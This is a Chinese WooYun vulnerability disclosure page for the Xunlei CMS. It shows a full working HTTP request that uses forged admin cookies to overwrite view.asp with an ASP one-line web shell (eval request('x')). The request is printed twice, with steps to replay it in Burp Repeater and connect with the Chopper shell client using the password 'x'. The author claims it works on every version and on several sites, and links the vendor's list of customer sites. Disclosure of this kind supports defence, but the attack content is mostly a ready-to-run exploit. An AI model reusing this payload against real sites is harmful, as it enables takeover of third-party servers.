当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-062244
漏洞标题:
银川迅雷网络全版本通杀Getshell
相关厂商:
银川迅雷网络有限公司
漏洞作者:
浅蓝
提交时间:
2014-05-26 11:26
修复时间:
2014-07-10 11:26
公开时间:
2014-07-10 11:26
漏洞类型:
文件上传导致任意代码执行
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-05-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

银川迅雷网络全版本通杀Getshell

详细说明:

POST /admin/wj.asp?Action=editfile&folder=..&url=../view.asp HTTP/1.1
Host: ************
Proxy-Connection: keep-alive
Content-Length: 709
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://nxlwtv.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://********/admin/wj.asp?Action=editfile&folder=..&url=../view.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSCCRCATR=BCCEHNEADCDFDGOAPCCDMLNM; CNZZDATA3143027=cnzz_eid%3D1585179978-1400986404-%26ntime%3D1400986404%26cnzz_a%3D0%26ltime%3D1400986403525; cmsname=admin; cmsid=1
url=..%2Fview.asp&folder=..&dpost=ok&content=%3C%21--%23include+file%3D%22inc%2Fconn.asp%22--%3E%0D%0A%3C%21--%23include+file%3D%22inc%2FLabelFunction.asp%22--%3E%0D%0A%3C%25%0D%0Aclassid%3Dconn.execute%28%22select+classid+from+cms_article+where+id+%3D+%22%26getnum%28%22id%22%29%29%280%29%0D%0Aset+rs+%3D+conn.execute%28%22select+template_view_id+from+cms_class+where+id+%3D+%22%26classid%29%0D%0Aset+aa+%3D+new+art_list%0D%0Aaa.templateurl%3DGetTemplate%284%2Crs%280%29%29%0D%0Aaa.templateaid%3Dgetnum%28%22id%22%29%0D%0Aaa.templatecid%3Dclassid%0D%0Aaa.templateapage%3Dgetnum%28%22apage%22%29%0D%0Astr%3Daa.tag%28%29%0D%0Aresponse.Write+str%0D%0A%25%3E%0D%0A%0D%0A%3C%25eval+request%28%22x%22%29%25%3E


把这段内容复制到burp repeater上 http://url/view.asp密码x

1.png


2.png


菜刀连接

3.png


换一个网站

4.png


再换一个

a.png


b.png


全版本通杀。

s.png


http://www.ycxl.net/index.php?m=Article&a=index&id=22 迅雷cms精选案例

漏洞证明:

POST /admin/wj.asp?Action=editfile&folder=..&url=../view.asp HTTP/1.1
Host: ************
Proxy-Connection: keep-alive
Content-Length: 709
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://nxlwtv.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://********/admin/wj.asp?Action=editfile&folder=..&url=../view.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSCCRCATR=BCCEHNEADCDFDGOAPCCDMLNM; CNZZDATA3143027=cnzz_eid%3D1585179978-1400986404-%26ntime%3D1400986404%26cnzz_a%3D0%26ltime%3D1400986403525; cmsname=admin; cmsid=1
url=..%2Fview.asp&folder=..&dpost=ok&content=%3C%21--%23include+file%3D%22inc%2Fconn.asp%22--%3E%0D%0A%3C%21--%23include+file%3D%22inc%2FLabelFunction.asp%22--%3E%0D%0A%3C%25%0D%0Aclassid%3Dconn.execute%28%22select+classid+from+cms_article+where+id+%3D+%22%26getnum%28%22id%22%29%29%280%29%0D%0Aset+rs+%3D+conn.execute%28%22select+template_view_id+from+cms_class+where+id+%3D+%22%26classid%29%0D%0Aset+aa+%3D+new+art_list%0D%0Aaa.templateurl%3DGetTemplate%284%2Crs%280%29%29%0D%0Aaa.templateaid%3Dgetnum%28%22id%22%29%0D%0Aaa.templatecid%3Dclassid%0D%0Aaa.templateapage%3Dgetnum%28%22apage%22%29%0D%0Astr%3Daa.tag%28%29%0D%0Aresponse.Write+str%0D%0A%25%3E%0D%0A%0D%0A%3C%25eval+request%28%22x%22%29%25%3E


把这段内容复制到burp repeater上 http://url/view.asp密码x

1.png


2.png


菜刀连接

3.png


换一个网站

4.png


再换一个

a.png


b.png


全版本通杀。

s.png


http://www.ycxl.net/index.php?m=Article&a=index&id=22 迅雷cms精选案例

修复方案:

都是cookie惹的祸,求20rank

版权声明:转载请注明来源 浅蓝@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝